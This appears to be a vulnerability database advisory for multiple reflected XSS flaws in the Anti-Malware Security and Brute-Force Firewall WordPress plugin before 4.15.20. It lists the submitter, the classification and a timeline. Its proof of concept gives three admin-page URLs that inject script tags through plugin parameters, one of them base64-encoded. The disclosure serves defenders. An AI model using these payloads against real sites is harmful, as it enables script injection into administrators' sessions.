WordPress Plugin Vulnerabilities
Anti-Malware & Brute-Force Security by ELI < 4.15.20 - Multiple Reflected XSS
Description
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability.
Proof of Concept
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest<script>alert(1)</script> http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=xsstest<script>alert(1)</script> http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
Tim Coen
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-05-15 (about 9 years ago)
Added
2015-05-15 (about 9 years ago)
Last Updated
2019-10-21 (about 4 years ago)